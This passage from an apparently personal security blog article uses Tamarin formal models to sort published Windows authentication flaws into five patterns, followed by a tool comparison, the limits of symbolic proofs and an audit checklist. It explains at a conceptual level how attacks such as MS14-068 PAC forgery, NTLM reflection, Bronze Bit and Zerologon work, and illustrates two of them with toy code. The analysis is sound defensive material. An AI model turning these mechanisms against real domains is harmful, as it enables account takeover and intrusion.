&lt;p&gt;The same shape recurs across protocols that share no code. CredSSP failed to bind its &lt;code&gt;pubKeyAuth&lt;/code&gt; value to the TLS session, so a man-in-the-middle could splice itself into an &lt;a href=&quot;https://paragmali.com/blog/rdp-authentication-26-years/&quot; rel=&quot;noopener&quot;&gt;RDP credential handshake&lt;/a&gt; [@cve-2018-0886]. LDAP accepted a bind without tying it to the TLS channel underneath, and Microsoft&apos;s own documentation is blunt that the default performed no channel-binding validation at all [@kb4034879] [@cve-2017-8563]. The companion guidance spells out the man-in-the-middle risk [@kb4520412] under the umbrella advisory for LDAP hardening [@adv190023]. And drop-the-MIC removed NTLM&apos;s integrity check without invalidating the surrounding signature.drop-the-MIC strips the NTLM message-integrity check from the negotiated flags without invalidating the outer signature, so a tampered exchange still verifies as authentic [@cve-2019-1040].&lt;/p&gt;
&lt;p&gt;The fixes are all the same idea wearing different names: the TLS channel bindings &lt;code&gt;tls-server-end-point&lt;/code&gt; and &lt;code&gt;tls-unique&lt;/code&gt; defined in RFC 5929 [@rfc5929], and the SPNEGO &lt;code&gt;mechListMIC&lt;/code&gt; that stops a negotiation downgrade [@rfc4178]. One subtlety decides whether the fix actually closes the door.RFC 5929&apos;s &lt;code&gt;tls-server-end-point&lt;/code&gt; hashes the server certificate, so it is per-&lt;em&gt;certificate&lt;/em&gt;, not per-&lt;em&gt;service&lt;/em&gt;. Two services sharing one certificate share one binding value -- which is exactly the gap that kept some LDAP deployments relayable even after binding was nominally enabled [@rfc5929].&lt;/p&gt;
&lt;h3&gt;Pattern 2: Keyed-vs-unkeyed integrity&lt;/h3&gt;
&lt;p&gt;The second pattern is a confusion between two things that look alike and behave nothing alike: a checksum and a keyed signature.&lt;/p&gt;

A checksum -- a CRC, a bare hash -- detects accidental corruption and needs no secret, so anyone can recompute it over data they forged. A message authentication code or signature is *keyed*: producing a valid tag requires a secret held by the legitimate sender -- a shared key the verifier also holds (a MAC), or a private key the verifier checks against the sender&apos;s public key (a signature). A verifier that accepts an unkeyed checksum where a keyed tag was required is trusting a value any attacker can produce [@cve-2014-6324].
&lt;p&gt;This is MS14-068 exactly. The KDC accepted a PAC whose integrity &quot;signature&quot; could be an unkeyed checksum, so a user could forge group memberships and compute a matching checksum themselves [@cve-2014-6324]. Require that the PAC carry a keyed signature under the &lt;code&gt;krbtgt&lt;/code&gt; key, and the same forgery fails because the user cannot produce the tag [@ms14-068]. The identical class shows up at the server-to-domain-controller PAC validation step, where a service asks a DC to vouch for a ticket&apos;s PAC [@ms-pac]. The fix and the failure are one mechanism, toggled.&lt;/p&gt;
&lt;p&gt;{`
// A toy checksum: no secret, so anyone can recompute it over any data.
function checksum(data) {
  let sum = 0;
  for (const ch of data) sum = (sum + ch.charCodeAt(0)) % 65521;
  return sum;
}
// A toy keyed tag: the value depends on a secret the attacker does not hold.
function tag(key, data) {
  let acc = key.length * 131;
  for (const ch of (key + data)) acc = (acc * 31 + ch.charCodeAt(0)) % 1000003;
  return acc;
}&lt;/p&gt;
&lt;p&gt;const forged = &quot;groups=domain-admins&quot;;&lt;/p&gt;
&lt;p&gt;// Unkeyed: the attacker computes the same checksum the verifier will recompute.
const attached = checksum(forged);
const verifier = checksum(forged);
console.log(&quot;unkeyed checksum accepts forged data:&quot;, attached === verifier); // true&lt;/p&gt;
&lt;p&gt;// Keyed: without the KDC secret, the attacker cannot match the expected tag.
const kdcSecret = &quot;krbtgt-secret&quot;;
const serverExpects = tag(kdcSecret, forged);
const attackerTag = tag(&quot;no-secret&quot;, forged);
console.log(&quot;forged keyed tag accepted:&quot;, attackerTag === serverExpects); // false
`}&lt;/p&gt;
&lt;h3&gt;Pattern 3: Symmetric-credential reflection&lt;/h3&gt;
&lt;p&gt;The third pattern is reflection. A credential computed by a keyed function that carries no direction or role tag can be bounced back at the party that produced it. The canonical Windows instance is NTLM credential reflection, fixed in MS08-068 [@ms08-068]: an attacker who receives a victim&apos;s challenge-response can send that same authenticator back to the victim&apos;s own machine and be accepted as the victim [@cve-2008-4037]. It sits in the SMBRelay lineage that opened our timeline [@cdc-smbrelay].&lt;/p&gt;
&lt;p&gt;The toggle is a direction tag. Remove it and the value a client produces is exactly the value a server will accept, so the reflection works. Restore a role offset -- so the two directions compute different values -- and the reflected response no longer matches.&lt;/p&gt;
&lt;p&gt;{`
// A symmetric response: both ends compute the same function of nonce and key.
function respond(key, nonce, role) {
  let acc = 0;
  for (const ch of (role + key + nonce)) acc = (acc * 33 + ch.charCodeAt(0)) % 1000003;
  return acc;
}&lt;/p&gt;
&lt;p&gt;const key = &quot;shared-session-key&quot;;
const nonce = &quot;server-nonce-1234&quot;;&lt;/p&gt;
&lt;p&gt;// No direction tag: what a client sends equals what a server would accept.
const clientSends = respond(key, nonce, &quot;&quot;);
const serverAccepts = respond(key, nonce, &quot;&quot;);
console.log(&quot;reflected response accepted, no tag:&quot;, clientSends === serverAccepts); // true&lt;/p&gt;
&lt;p&gt;// With a direction tag, the two directions diverge and reflection fails.
const clientTagged = respond(key, nonce, &quot;client-to-server&quot;);
const serverTagged = respond(key, nonce, &quot;server-to-client&quot;);
console.log(&quot;reflected response accepted, tagged:&quot;, clientTagged === serverTagged); // false
`}&lt;/p&gt;
&lt;p&gt;There is one place this pattern is easy to overclaim, and the honesty frame of this whole article depends on not doing so.In my Tamarin model of &lt;code&gt;[MS-NRPC]&lt;/code&gt;, a client may pick its Netlogon &lt;code&gt;NetrServerAuthenticate3&lt;/code&gt; challenge to coincide with the server&apos;s -- a &lt;em&gt;structural&lt;/em&gt; reflection the symbolic model can express. This is a modeling observation, not a separately published Netlogon weakness; the famous Zerologon escalation turns on the computational AES-CFB8 zero-IV weakness that a perfect-crypto model cannot represent. Zerologon appears here only as the Section 9 boundary illustration -- encoded as an equation, never discovered [@cve-2020-1472].&lt;/p&gt;
&lt;h3&gt;Pattern 4: Identity-binding gaps in signed tokens&lt;/h3&gt;
&lt;p&gt;The fourth pattern is a signed thing -- a reply, a ticket, an assertion, a certificate -- that is correctly signed and yet fails to bind &lt;em&gt;who&lt;/em&gt; it is for. PKINIT is the textbook case: the KDC&apos;s reply was not bound to the requesting client&apos;s identity, the gap Cervesato and colleagues formalized [@cjstw-infcomput]. In Diffie-Hellman mode this becomes an unknown-key-share risk, where a client can be steered into misattributing a key. The fix binds the request itself with the &lt;code&gt;paChecksum&lt;/code&gt; defined in RFC 4556 Section 3.2.1, a checksum over the request body [@rfc4556]. RFC 8636 later made its hash negotiable under &quot;paChecksum Agility&quot; -- it did not add the field, it standardized the field&apos;s agility [@rfc8636].&lt;/p&gt;
&lt;p&gt;The same gap appears wherever a token crosses a trust boundary. SAML single sign-on needed an audience restriction so an assertion minted for one service could not be redirected to another [@armando-saml]. AD CS certificate enrollment needed the issued certificate&apos;s subject bound to the requester&apos;s real identity -- absent that, the Certifried technique let a low-privilege account enroll a certificate for a domain controller [@cve-2022-26923], a later escalation across the &lt;a href=&quot;https://paragmali.com/blog/certified-pre-owned-ad-cs-and-active-directorys-second-trust/&quot; rel=&quot;noopener&quot;&gt;AD CS attack surface&lt;/a&gt; that SpecterOps&apos;s Certified Pre-Owned had first mapped in June 2021 [@specterops-cpo]. OAuth&apos;s on-behalf-of exchange needs its token audience checked to avoid a confused-deputy redirection [@rfc6819], and device registration needs a proof-of-possession binding so a bearer token cannot be replayed against a key the device never held [@rfc7800].&lt;/p&gt;
&lt;h3&gt;Pattern 5: Delegation and composition&lt;/h3&gt;
&lt;p&gt;The fifth pattern is the subtlest, because every component is sound on its own. The failure lives in the &lt;em&gt;chain&lt;/em&gt;. Kerberos constrained delegation lets a service act on a user&apos;s behalf, gated by whether a ticket is marked forwardable. The Bronze Bit technique flipped that restriction: a compromised service could tamper with a service ticket that was not valid for delegation and force the KDC to accept it, because the relevant integrity was not protected by the KDC&apos;s own ticket signature [@cve-2020-17049]. Restore the check on the &lt;code&gt;krbtgt&lt;/code&gt; ticket signature and the tampered ticket is rejected [@netspi-bronzebit].&lt;/p&gt;
&lt;p&gt;Composition multiplies the surface. Resource-based constrained delegation chains can be assembled into escalation paths that no single hop authorizes [@shamir-wagging]. A cross-protocol NTLM relay shares one credential across SMB, LDAP, and CredSSP at once, so a binding omitted in any one leg reopens the whole composition. And IKE&apos;s cross-mode confusion is a composition failure at the key-exchange layer, where mixing modes defeats a property each mode satisfies alone [@cremers-ipsec].&lt;/p&gt;

You can run these five questions against a protocol you have never modeled formally and never will: channel binding, keyed integrity, direction tags, identity binding, and a restriction that survives composition. Asked of a design document, they catch the families behind two decades of Windows-auth CVEs before any of them ships. Section 11 turns them into a checklist, each paired with the fix that already exists.
&lt;p&gt;Every pattern so far is a way something &lt;em&gt;broke&lt;/em&gt;. But the instrument that exhibits a break can also prove a guarantee -- and when I pushed twelve of these models under stronger attackers, what came back was not new bugs but stronger proofs. What did the deep models actually prove?&lt;/p&gt;
&lt;h2&gt;7. What the Deep Models Proved&lt;/h2&gt;
&lt;p&gt;A prover does not only produce counterexamples. When a lemma holds, you get a proof -- a statement that across every run, under this attacker, nothing violates the property. So I took twelve of the models and deepened them: same protocols, stronger attacker. The headline stayed the same. No new breaks. What changed is that the guarantees got stronger, and I can say precisely which attacker capability each one now survives. Everything below is my Tamarin verification within the Dolev-Yao model, each item anchored to the public specification or CVE it concerns -- not an independently published finding.&lt;/p&gt;

A session&apos;s keys stay secret even if the parties&apos; long-term keys are compromised later. Traffic captured today remains protected against a key leak tomorrow, because the session key depended on ephemeral values that no longer exist [@rfc4556].

Compromising a party&apos;s own long-term key obviously lets an attacker impersonate that party. KCI resistance is the narrower guarantee that it does not *also* let the attacker impersonate other parties *to* the compromised one [@cremers-ipsec].
&lt;p&gt;The deepenings follow a single recipe: add an attacker capability the per-protocol models had assumed away, then see which lemma still holds.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Guarantee&lt;/th&gt;
&lt;th&gt;Attacker capability added&lt;/th&gt;
&lt;th&gt;Lemma that still holds&lt;/th&gt;
&lt;th&gt;Public anchor&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Forward secrecy, PKINIT-DH&lt;/td&gt;
&lt;td&gt;reveal &lt;em&gt;both&lt;/em&gt; client and KDC long-term signing keys after the run&lt;/td&gt;
&lt;td&gt;AS reply key stays secret; only the two ephemerals protect it&lt;/td&gt;
&lt;td&gt;[@rfc4556]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;KCI resistance, PKINIT-DH&lt;/td&gt;
&lt;td&gt;compromise the client&apos;s own long-term key&lt;/td&gt;
&lt;td&gt;client still authenticates the genuine KDC&lt;/td&gt;
&lt;td&gt;[@rfc4556]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mutual auth and PFS, IPsec IKE&lt;/td&gt;
&lt;td&gt;ephemeral reveal, then &lt;em&gt;both&lt;/em&gt; parties&apos; long-term keys&lt;/td&gt;
&lt;td&gt;injective mutual authentication and forward secrecy survive&lt;/td&gt;
&lt;td&gt;[@cremers-ipsec]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hybrid PQ-KEX transcript binding&lt;/td&gt;
&lt;td&gt;reveal &lt;em&gt;both&lt;/em&gt; the DH and KEM legs (both-leg compromise)&lt;/td&gt;
&lt;td&gt;acceptance still binds the genuine transcript and key&lt;/td&gt;
&lt;td&gt;author&apos;s Tamarin model&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Per-channel bindings under composition&lt;/td&gt;
&lt;td&gt;one shared NTLMv2 credential feeding SMB, LDAP, and CredSSP under a relay attacker&lt;/td&gt;
&lt;td&gt;each acceptor&apos;s binding holds inside the composition&lt;/td&gt;
&lt;td&gt;[@cve-2019-1040] [@cve-2018-0886] [@cve-2017-8563] [@rfc5929]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SID filtering and Silver-Ticket containment&lt;/td&gt;
&lt;td&gt;cross-domain referrals, the full four-signature PAC, and service-key reveal&lt;/td&gt;
&lt;td&gt;external forests stay contained; DC-validated PACs defeat Silver Tickets&lt;/td&gt;
&lt;td&gt;[@ms-pac]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bronze-Bit and Protected-User non-delegation&lt;/td&gt;
&lt;td&gt;arbitrary service-key compromise across S4U, RBCD, and PKINIT at once&lt;/td&gt;
&lt;td&gt;every delegated impersonation traces to a legitimate KDC grant; Protected Users are never delegated&lt;/td&gt;
&lt;td&gt;[@cve-2020-17049] [@protected-users] [@shamir-wagging]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;A few deserve a sentence. PKINIT&apos;s public-key-encryption mode structurally &lt;em&gt;cannot&lt;/em&gt; offer forward secrecy, because the reply key arrives encrypted to a long-term key; the DH mode can, and the deepened model proves it does even when both signing keys leak after the run [@rfc4556]. The hybrid post-quantum result is the strongest-sounding and has no public primary, so I flag it as model-only: binding the KEM ciphertext into the transcript keeps a client&apos;s acceptance tied to the genuine server even when both the classical and post-quantum legs are revealed. The delegation result matters most operationally: a &lt;a href=&quot;https://paragmali.com/blog/who-is-allowed-to-log-in-where-the-kdc-side-answer-to-creden/&quot; rel=&quot;noopener&quot;&gt;Protected Users account&lt;/a&gt; is never delegated by any path -- classic, resource-based, or PKINIT-issued -- even under arbitrary service-key compromise [@protected-users].&lt;/p&gt;
&lt;p&gt;Honesty requires one scar on this table.One deepening did not yield an independent re-proof in my sandbox. The heaviest cross-domain four-signature-PAC model exhausted memory -- an out-of-memory EXIT 137 -- before Tamarin terminated. I record that result as reported, not independently re-proved [@ms-pac]. A guarantee I cannot re-derive is a guarantee I report with an asterisk, not one I assert.&lt;/p&gt;
&lt;p&gt;These proofs are strong, but they are exactly as strong as the model they live in -- no stronger. So the fair next question is how Tamarin compares with the other instruments on the bench, and, more pointedly, what it is choosing not to see.&lt;/p&gt;
&lt;h2&gt;8. Symbolic, Computational, and the Tools Between&lt;/h2&gt;
&lt;p&gt;Tamarin was the right instrument for this corpus, but it is one of several, and the honest comparison is about what each one buys and what it costs. The computer-aided cryptography community&apos;s own survey lays out the taxonomy, and I follow it here [@sok-cac].&lt;/p&gt;
&lt;p&gt;The first split is the model. Symbolic tools -- Tamarin, ProVerif, Scyther -- work in the Dolev-Yao world of perfect cryptography and reason about protocol logic. Computational tools -- CryptoVerif, EasyCrypt -- model the attacker as a probabilistic polynomial-time algorithm and produce bounds on its success probability [@sok-cac]. They answer different questions, which is why a single benchmark number rarely transfers between them.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Model&lt;/th&gt;
&lt;th&gt;Termination&lt;/th&gt;
&lt;th&gt;DH and state&lt;/th&gt;
&lt;th&gt;Style&lt;/th&gt;
&lt;th&gt;Best at&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Tamarin&lt;/td&gt;
&lt;td&gt;symbolic, Dolev-Yao&lt;/td&gt;
&lt;td&gt;may not terminate&lt;/td&gt;
&lt;td&gt;DH plus mutable state, unbounded&lt;/td&gt;
&lt;td&gt;automated and interactive&lt;/td&gt;
&lt;td&gt;stateful key exchange, proofs and attack traces [@tamarin-cav]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ProVerif&lt;/td&gt;
&lt;td&gt;symbolic, applied pi and Horn clauses&lt;/td&gt;
&lt;td&gt;usually terminates, over-approximates&lt;/td&gt;
&lt;td&gt;limited state&lt;/td&gt;
&lt;td&gt;automated&lt;/td&gt;
&lt;td&gt;fast unbounded analysis, but can report false attacks [@proverif-home]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Scyther&lt;/td&gt;
&lt;td&gt;symbolic, pattern refinement&lt;/td&gt;
&lt;td&gt;guaranteed on its protocol class&lt;/td&gt;
&lt;td&gt;limited&lt;/td&gt;
&lt;td&gt;automated&lt;/td&gt;
&lt;td&gt;guaranteed termination on a restricted class [@scyther-repo] [@scyther-cav-2008-tool]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CryptoVerif&lt;/td&gt;
&lt;td&gt;computational, game-based&lt;/td&gt;
&lt;td&gt;semi-automated&lt;/td&gt;
&lt;td&gt;not applicable&lt;/td&gt;
&lt;td&gt;guided&lt;/td&gt;
&lt;td&gt;concrete probability bounds [@cryptoverif-home]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EasyCrypt&lt;/td&gt;
&lt;td&gt;computational, proof assistant&lt;/td&gt;
&lt;td&gt;manual&lt;/td&gt;
&lt;td&gt;not applicable&lt;/td&gt;
&lt;td&gt;interactive&lt;/td&gt;
&lt;td&gt;primitive-level and game-based proofs [@easycrypt-home]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Why Tamarin for Windows authentication, then? Because these protocols need Diffie-Hellman and post-quantum KEMs, credential state that mutates as tickets are issued, unbounded sessions, and both proofs and concrete attack traces in one tool [@tamarin-cav]. ProVerif is often faster, but its Horn-clause over-approximation makes stateful DH flows awkward and can surface attacks that do not really exist [@proverif-home]. Scyther guarantees termination, but only on a restricted protocol class that this corpus repeatedly steps outside of [@scyther-repo]. The pattern-refinement technique behind Scyther is worth reading in its own right [@scyther-ccs-2008].&lt;/p&gt;
&lt;p&gt;Could a symbolic proof simply hand off to a computational guarantee? Sometimes, and that bridge has a name.&lt;/p&gt;

A theorem that carries a symbolic proof over to a computational guarantee, provided the cryptographic primitives satisfy specific conditions. The Abadi-Rogaway results established it for formal encryption, but only under strong, primitive-specific side-conditions [@abadi-rogaway-ifip]. There is no universal computational-soundness theorem [@abadi-rogaway-joc].
&lt;p&gt;So the bridge is real but partial, which is why the survey&apos;s recommendation is not &quot;pick the best tool&quot; but &quot;combine them&quot;: symbolic for protocol logic at scale, computational for primitive strength, and a third layer for the code [@sok-cac]. That third layer is the active frontier. DY* embeds Dolev-Yao symbolic analysis as a library for executable F* code and used it to mechanize Signal end to end, closing the gap between a model and the program that ships [@dystar-ieee] [@dystar-repo]. Verifpal trades some expressiveness for a gentler modeling language with formal semantics, aiming to lower the rate of modeling mistakes [@verifpal-eprint].&lt;/p&gt;
&lt;p&gt;Every one of those tools, the symbolic ones especially, shares a single blind spot. It is not a defect in any implementation. It is the definition of the model itself -- and it is where this article has been heading all along.&lt;/p&gt;
&lt;h2&gt;9. The Boundary the Method Cannot Cross&lt;/h2&gt;
&lt;p&gt;Return to the question from the first paragraph: was Kerberos broken, or did it just look broken? The honest answer is that a perfect-crypto model can prove a protocol&apos;s &lt;em&gt;logic&lt;/em&gt; sound and still be completely blind to a flaw that ships a domain takeover. Two results make that boundary precise, and neither is a defect you could engineer away.&lt;/p&gt;
&lt;p&gt;The first is about decidability. Durgin, Lincoln, Mitchell, and Scedrov showed that secrecy for protocols with an unbounded number of sessions is undecidable [@dlms-2004]. Restrict to a bounded number of sessions and the problem becomes &quot;merely&quot; NP-complete, as Rusinowitch and Turuani proved [@rusinowitch-turuani]. Put those together and you get a hard fact about tooling: no symbolic verifier can be simultaneously sound, complete, and guaranteed to terminate. Each tool gives up one. Tamarin may not terminate; ProVerif sacrifices completeness and can report false attacks; Scyther restricts the protocol class it accepts [@sok-cac].&lt;/p&gt;
&lt;p&gt;The second boundary is sharper, and it is the heart of the whole article. The Dolev-Yao model abstracts cryptography to perfect operations, so it provably cannot represent a flaw that lives in the cryptographic arithmetic itself. Zerologon is the flagship example. The Netlogon credential used AES in CFB8 mode with an all-zero initialization vector, and with probability $\approx 1/256$ per attempt an all-zero plaintext produced an all-zero ciphertext, letting an unauthenticated attacker forge the credential and ultimately seize a domain controller [@cve-2020-1472]. The mechanism is laid out in the disclosure whitepaper [@secura-zerologon]. No symbolic model sees this, because the model has no notion of an IV, a block-cipher mode, or a $1/256$ probability. There is nothing to find.&lt;/p&gt;

flowchart TD
    F[A protocol failure] --&amp;gt; Q{&quot;Is it in the message logic or in the cryptographic arithmetic?&quot;}
    Q --&amp;gt;|Message logic| S[Symbolic model sees it: relay, reflection, missing binding, signature confusion]
    Q --&amp;gt;|Cryptographic arithmetic| C[Symbolic model is blind: zero-IV, weak hash, probability gaps]
    C --&amp;gt; Z[Zerologon lives here, encoded as an equation, never discovered]
    S --&amp;gt; V[Tamarin can verify or falsify]
&lt;p&gt;This is why the article has been so insistent about one phrase. Where the corpus shows a computational consequence, it &lt;em&gt;encoded&lt;/em&gt; the published weakness as an equation in the model; it did not find it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A symbolic prover that &quot;reproduces&quot; Zerologon has not discovered anything about the cipher. It has had the weakness hand-fed to it as an algebraic identity. Reporting an encoded computational flaw as a symbolic finding is the single most tempting way to overclaim with these tools, and it is wrong every time.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A proof inherits the blind spots of its model. &quot;Verified in Tamarin&quot; means the protocol logic holds against a Dolev-Yao attacker -- it says nothing about the primitives, the probabilities, or the implementation. Always validate the model against the specification, and never read &quot;verified&quot; as &quot;safe.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The boundary is the result, not a failure. Unbounded verification is undecidable, and a perfect-crypto model provably cannot represent a probabilistic flaw. So &quot;nothing new across a well-studied corpus&quot; is not an anticlimax. It is the model telling you, precisely, that the protocol logic is sound and that whatever risk remains must live one layer down. That is the most useful thing a symbolic prover can say -- and it can only say it honestly if you respect the wall.&lt;/p&gt;
&lt;/blockquote&gt;

Verified means: within this model, against this adversary, no trace violates this property. Nothing more, and nothing less.
&lt;p&gt;The boundary also tells you which famous attacks were never in scope to begin with.&lt;/p&gt;

Kerberoasting [@attack-t1558-003] and AS-REP roasting [@attack-t1558-004] are offline password cracking. Pass-the-Hash is credential theft [@attack-t1550-002]. Golden and Silver tickets are forgeries that start from a compromised key [@attack-t1558-001] [@attack-t1558-002]. DCSync is permission abuse over a replication interface [@attack-t1003-006]. None of these is a protocol-logic flaw, so a perfect-crypto symbolic model cannot see them -- not because the model failed, but because they live, by definition, outside it. A model can encode a stolen key and check whether a containment holds; it cannot &quot;discover&quot; theft as a logic bug.
&lt;p&gt;If the boundary is permanent -- and it is -- then the most interesting questions live right up against it. Where does the method, and this particular corpus, still strain?&lt;/p&gt;
&lt;h2&gt;10. Where the Method Still Strains&lt;/h2&gt;
&lt;p&gt;The boundary is not the end of the work; it is where the hardest open problems begin. Five of them bound this corpus.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Computational soundness at full-protocol scale.&lt;/strong&gt; The dream is to lift a symbolic proof of a deployed protocol automatically to a computational guarantee covering the real primitives -- exactly the gap that hides Zerologon-class flaws. Soundness theorems exist, but only for restricted primitives and conditions [@abadi-rogaway-ifip]. The working answer today is the survey&apos;s layered stack -- combine symbolic, computational, and code-level tools -- not a universal bridge [@sok-cac].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Termination with full algebraic theories.&lt;/strong&gt; Tamarin reasons about Diffie-Hellman and exclusive-or, but with those theories it may not terminate, and terminating results exist only for restricted equational fragments such as Scyther&apos;s class. The undecidability wall keeps this an open trade between expressiveness and automation [@dlms-2004].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Composition and whole deployments.&lt;/strong&gt; Composition theorems are provable for specific seams -- per-channel bindings survive a shared-credential relay, for instance. But scaling to a whole interacting deployment is unsolved, and this corpus hit the wall directly: the heaviest cross-domain four-signature-PAC model exhausted memory on independent re-proof, a concrete state-explosion failure rather than a theoretical one [@cremers-ipsec].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Privacy and equivalence at scale.&lt;/strong&gt; Secrecy and authentication are reachability properties. Privacy properties -- unlinkability, anonymity -- are equivalence properties, which are markedly harder and scale worse. Tamarin&apos;s observational equivalence and ProVerif&apos;s equivalence checking handle modest protocols, but the frontier here is genuinely hard [@sok-cac].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;From verified models to verified deployments.&lt;/strong&gt; A proof about a model is only as good as the model&apos;s fidelity to the running code. DY* mechanized Signal end to end from executable F* code [@dystar-ieee], and Verifpal lowers the modeling-error rate with friendlier semantics [@verifpal-eprint]. But &lt;code&gt;[MS-*]&lt;/code&gt; implementations are closed, so for this corpus model fidelity has to be &lt;em&gt;argued&lt;/em&gt; from the public specification rather than mechanically derived from the binaries.&lt;/p&gt;
&lt;p&gt;Those are the frontier&apos;s problems, and none of them has to be solved before the five patterns become useful. Here is what you can do with them this afternoon.&lt;/p&gt;
&lt;h2&gt;11. Auditing With the Five Patterns&lt;/h2&gt;
&lt;p&gt;The taxonomy earns its keep as a checklist. You do not need Tamarin to use it -- you need a specification, a design review, and five questions. Each maps to a concrete Windows mechanism and a documented fix.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; 1. &lt;strong&gt;Channel binding.&lt;/strong&gt; Is every authenticator bound to the endpoint it is used on? The fix is a TLS channel binding such as &lt;code&gt;tls-server-end-point&lt;/code&gt;, Extended Protection for Authentication, and the SPNEGO &lt;code&gt;mechListMIC&lt;/code&gt; against downgrade [@rfc5929] [@rfc4178]. 2. &lt;strong&gt;Keyed integrity.&lt;/strong&gt; Is every integrity check keyed, never a bare checksum? The fix is the keyed PAC signature MS14-068 should have required [@cve-2014-6324]. 3. &lt;strong&gt;Direction tags.&lt;/strong&gt; Does every symmetric credential carry a direction or role tag? In a model the remedy is a direction/role offset; MS08-068 itself shipped it as reflection/replay detection -- the SMB endpoint records the challenge it issued and rejects an authenticator that comes back carrying it [@ms08-068]. 4. &lt;strong&gt;Identity binding.&lt;/strong&gt; Does every signed token bind requester, key, and audience? For PKINIT that is the &lt;code&gt;paChecksum&lt;/code&gt; request-binding of RFC 4556 Section 3.2.1, whose hash RFC 8636 made agile [@rfc4556] [@rfc8636]. 5. &lt;strong&gt;Delegation.&lt;/strong&gt; Does every delegation chain keep its restriction under composition? The fix is the &lt;code&gt;krbtgt&lt;/code&gt; ticket signature Bronze Bit bypassed [@cve-2020-17049].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A &quot;no&quot; to any question does not prove a break -- it tells you where to look first, and which published fix already exists. That is the difference between a taxonomy and a vulnerability scanner: the taxonomy makes you faster at the questions, not lazier about the answers.&lt;/p&gt;
&lt;p&gt;If you go further and model a protocol yourself, the corpus&apos;s method carries two warnings worth repeating.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Keep each flawed/fixed pair minimal: toggle exactly one mechanism, so a falsification points at one cause. Always add a control that re-enables the mechanism and flips the verdict back, or you cannot tell a real break from a modeling artifact. Validate the model against the specification it claims to represent. And never report an encoded probabilistic flaw as a symbolic finding [@sok-cac].&lt;/p&gt;
&lt;/blockquote&gt;

The most common channel-binding gaps in a real domain are LDAP, RDP, and SMB. Microsoft&apos;s guidance is to move `LdapEnforceChannelBinding` toward enforcement once clients are ready [@kb4034879], following the staged requirements in the LDAP hardening advisory [@adv190023] and its companion timeline [@kb4520412]; to keep CredSSP patched so the `pubKeyAuth` binding is enforced [@cve-2018-0886]; and to require SMB signing so a relayed session cannot be tampered mid-stream [@ms-smb-signing]. None of these is exotic -- they are Pattern 1, three times.
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;formally-verifying-windows-authentication&quot; keyTerms={[
  { term: &quot;Channel binding&quot;, definition: &quot;Tying an inner authenticator to the outer channel or endpoint it travels on, so it cannot be relayed elsewhere.&quot; },
  { term: &quot;Keyed vs unkeyed integrity&quot;, definition: &quot;A MAC or signature requires a secret to produce; a checksum does not, so an unkeyed check is forgeable by anyone.&quot; },
  { term: &quot;Credential reflection&quot;, definition: &quot;Bouncing a symmetric authenticator back at its sender when it carries no direction or role tag.&quot; },
  { term: &quot;Identity binding&quot;, definition: &quot;Binding a signed token to its requester, key, and intended audience so it cannot be substituted or redirected.&quot; },
  { term: &quot;Delegation and composition&quot;, definition: &quot;Preserving a delegation restriction across chains and across protocols that share a credential.&quot; }
]} /&amp;gt;&lt;/p&gt;
&lt;p&gt;Run those five questions and you are doing by hand what the corpus did by machine. Which leaves only the questions people ask out loud when they hear the phrase &quot;I verified Windows authentication and found nothing.&quot;&lt;/p&gt;
&lt;h2&gt;12. Questions People Ask&lt;/h2&gt;


No, and that is the point. Every break in this article was already published, with its own CVE, RFC, or paper. The contribution is not a bug; it is the unified, machine-checked taxonomy that shows these breaks are five recurring shapes rather than two dozen unrelated accidents. Finding zero new vulnerabilities across a corpus this well-studied is the evidence the taxonomy is real, not a disappointment.


No -- &quot;verified&quot; and &quot;secure&quot; are different claims. A Dolev-Yao proof certifies that the protocol *logic* holds against the modeled adversary, and nothing more: the strength of the primitives, the probabilities, and the shipped implementation all sit outside the model. Section 9 draws that line precisely and explains why a clean proof narrows where the remaining risk can live without eliminating it.


